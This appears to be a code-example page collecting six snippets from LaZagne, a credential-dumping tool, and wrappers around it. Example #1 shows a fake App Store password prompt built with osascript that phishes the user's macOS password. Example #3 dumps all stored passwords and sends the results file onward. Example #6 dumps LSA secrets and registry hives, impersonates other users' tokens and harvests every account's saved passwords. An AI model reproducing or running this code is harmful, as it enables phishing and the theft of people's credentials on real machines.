Пример #1
0
def run_lazagne(category_selected='all', subcategories={}, password=None, interactive=False):
    """
    Main function
    """
    if password:
        constant.user_password = password

    if not constant.st:
        constant.st = StandardOutput()

    user = getpass.getuser()
    constant.finalResults = {'User': user}

    # Could be easily changed
    application = 'App Store'

    i = 0
    while True:
        # Run all modules
        for r in run_modules(category_selected, subcategories):
            yield r

        # Execute once if not interactive,
        # Otherwise print the dialog box until the user keychain is unlocked (so the user password has been found)
        if not interactive or (interactive and constant.user_keychain_find):
            break

        elif interactive and not constant.user_keychain_find:
            msg = ''
            if i == 0:
                msg = 'App Store requires your password to continue.'
            else:
                msg = 'Password incorrect! Please try again.'

            # Code inspired from: https://github.com/fuzzynop/FiveOnceInYourLife
            cmd = 'osascript -e \'tell app "{application}" to activate\' -e \'tell app "{application}" ' \
                  'to activate\' -e \'tell app "{application}" to display dialog "{msg}" & return & ' \
                  'return  default answer "" with icon 1 with hidden answer with title "{application} Alert"\''.format(
                    application=application, msg=msg
            )
            pwd = run_cmd(cmd)
            if pwd.split(':')[1].startswith('OK'):
                constant.user_password = pwd.split(':')[2].strip()

        i += 1

        # If the user enter 10 bad password, be nice with him and break the loop
        if i > 10:
            break

    # If keychains has been decrypted, launch again some module
    chrome_key = get_safe_storage_key('Chrome Safe Storage')
    if chrome_key:
        for r in run_module({'chrome': Chrome(safe_storage_key=chrome_key)}, subcategories):
            yield r

    constant.stdout_result.append(constant.finalResults)
Пример #2
0
def run_lazagne(category_selected='all', subcategories={}):
    """
    Main function
    """
    if not constant.st:
        constant.st = StandardOutput()

    user = getpass.getuser()
    constant.finalResults = {'User': user}

    for r in run_modules(category_selected, subcategories):
        yield r

    constant.stdout_result.append(constant.finalResults)
Пример #3
0
    def password_dump(self, password=None):
        with tempfile.TemporaryDirectory() as tmp:
            constant.st = StandardOutput()

            out = StringIO()

            constant.output = 'txt'
            constant.folder_name = tmp

            level = logging.getLogger(LOGGER_ID).level

            if level == logging.DEBUG:
                constant.quiet_mode = False
            else:
                constant.quiet_mode = True

            formatter = logging.Formatter(fmt='%(message)s')
            stream = logging.StreamHandler(out)
            stream.setFormatter(formatter)
            root = logging.getLogger(__name__)
            root.setLevel(level)

            for r in root.handlers:
                r.setLevel(logging.CRITICAL)
            root.addHandler(stream)

            constant.st.first_title()

            if platforms.OS in [platforms.WINDOWS, platforms.DARWIN]:
                constant.user_password = password

                for _ in run_lazagne(category_selected="all", subcategories={password: password}, password=password):
                    pass
            else:
                for _ in run_lazagne(category_selected="all", subcategories={}):
                    pass

            write_in_file(constant.stdout_result)

            # find file in the tmp dir and send it
            for it in os.scandir(tmp):
                if not it.is_dir() and it.path.endswith(".txt"):
                    self.receive(it.path)
                    return

            self.es.send_json(ERROR, "Error getting results file.")
Пример #4
0
import json

from lazagne.config.write_output import write_in_file, StandardOutput
from lazagne.config.manage_modules import get_categories
from lazagne.config.constant import constant
from lazagne.config.run import run_lazagne, create_module_dic


##############################################################################
#                                                                            #
#                           By Alessandro ZANNI                              #
#                                                                            #
##############################################################################

# Disclaimer: Do Not Use this program for illegal purposes ;)
constant.st = StandardOutput()  # Object used to manage the output / write functions (cf write_output file)
modules = create_module_dic()


def output(output_dir=None, txt_format=False, json_format=False, all_format=False):
    if output_dir:
        if os.path.isdir(output_dir):
            constant.folder_name = output_dir
        else:
            print('[!] Specify a directory, not a file !')

    if txt_format:
        constant.output = 'txt'

    if json_format:
        constant.output = 'json'
Пример #5
0
import json
import sys
import os
import traceback
import argparse
import logging
import getpass

from lazagne.config.write_output import parse_json_result_to_buffer, print_debug, StandardOutput
from lazagne.config.manage_modules import get_categories, get_modules
from lazagne.config.constant import *

import time

# Object used to manage the output / write functions (cf write_output file)
constant.st = StandardOutput()

# Tab containing all passwords
stdoutRes = []
modules = {}

# Define a dictionary for all modules
for c in get_categories():
    modules[c] = {}

# Add all modules to the dictionary
for m in get_modules():
    modules[m.category][m.options['dest']] = m


def output():
Пример #6
0
def run_lazagne(category_selected='all', subcategories={}, password=None):
    """
    Execution Workflow:
    - If admin:
        - Execute system modules to retrieve LSA Secrets and user passwords if possible
            - These secret could be useful for further decryption (e.g Wifi)
        - If a process of another user is launched try to impersone it (impersonating his token)
            - TO DO: if hashdump retrieved other local account, launch a new process using psexec techniques 
    - From our user:
        - Retrieve all passwords using their own password storage algorithm (Firefox, Pidgin, etc.)
        - Retrieve all passwords using Windows API - CryptUnprotectData (Chrome, etc.)
        - If the user password or the dpapi hash is found:
            - Retrieve all passowrds from an encrypted blob (Credentials files, Vaults, etc.)
    - From all users found on the filesystem (e.g C:\\Users) - Need admin privilege:
        - Retrieve all passwords using their own password storage algorithm (Firefox, Pidgin, etc.)
        - If the user password or the dpapi hash is found:
            - Retrieve all passowrds from an encrypted blob (Chrome, Credentials files, Vaults, etc.)

    To resume:
    - Some passwords (e.g Firefox) could be retrieved from any other user
    - CryptUnprotectData can be called only from our current session
    - DPAPI Blob can decrypted only if we have the password or the hash of the user
    """

    # Useful if this function is called from another tool
    if password:
        constant.user_password = password

    if not constant.st:
        constant.st = StandardOutput()

    # --------- Execute System modules ---------
    if ctypes.windll.shell32.IsUserAnAdmin() != 0:
        if save_hives():
            # System modules (hashdump, lsa secrets, etc.)
            constant.username = '******'
            constant.finalResults = {'User': constant.username}
            constant.system_dpapi = SystemDpapi()

            if logging.getLogger().isEnabledFor(logging.INFO):
                constant.st.print_user(constant.username)
            yield 'User', constant.username

            try:
                for r in run_category(category_selected,
                                      subcategories,
                                      system_module=True):
                    yield r
            except:  # Catch all kind of exceptions
                pass
            finally:
                delete_hives()

            constant.stdout_result.append(constant.finalResults)

    # ------ Part used for user impersonation ------

    constant.is_current_user = True
    constant.username = get_username_winapi()
    if not constant.username.endswith('$'):

        constant.finalResults = {'User': constant.username}
        constant.st.print_user(constant.username)
        yield 'User', constant.username

        set_env_variables(user=constant.username)

        for r in run_category(category_selected, subcategories):
            yield r
        constant.stdout_result.append(constant.finalResults)

    # Check if admin to impersonate
    if ctypes.windll.shell32.IsUserAnAdmin() != 0:

        # --------- Impersonation using tokens ---------

        sids = list_sids()
        impersonate_users = {}
        impersonated_user = [constant.username]

        for sid in sids:
            # Not save the current user's SIDs and not impersonate system user
            if constant.username != sid[3] and sid[2] != 'S-1-5-18':
                impersonate_users.setdefault(sid[3], []).append(sid[2])

        for user in impersonate_users:
            if 'service' in user.lower().strip():
                continue

            # Do not impersonate the same user twice
            if user in impersonated_user:
                continue

            constant.st.print_user(user)
            yield 'User', user

            constant.finalResults = {'User': user}
            for sid in impersonate_users[user]:
                try:
                    set_env_variables(user, to_impersonate=True)
                    if impersonate_sid_long_handle(sid, close=False):
                        impersonated_user.append(user)

                        # Launch module wanted
                        for r in run_category(category_selected,
                                              subcategories):
                            yield r

                        rev2self()
                        constant.stdout_result.append(constant.finalResults)
                        break
                except Exception:
                    print_debug('DEBUG', traceback.format_exc())

        # --------- Impersonation browsing file system ---------

        constant.is_current_user = False
        # Ready to check for all users remaining
        all_users = get_user_list_on_filesystem(
            impersonated_user=[constant.username])
        for user in all_users:
            # Fix value by default for user environment (APPDATA and USERPROFILE)
            set_env_variables(user, to_impersonate=True)
            constant.st.print_user(user)

            constant.username = user
            constant.finalResults = {'User': user}
            yield 'User', user

            # Retrieve passwords that need high privileges
            for r in run_category(category_selected, subcategories):
                yield r

            constant.stdout_result.append(constant.finalResults)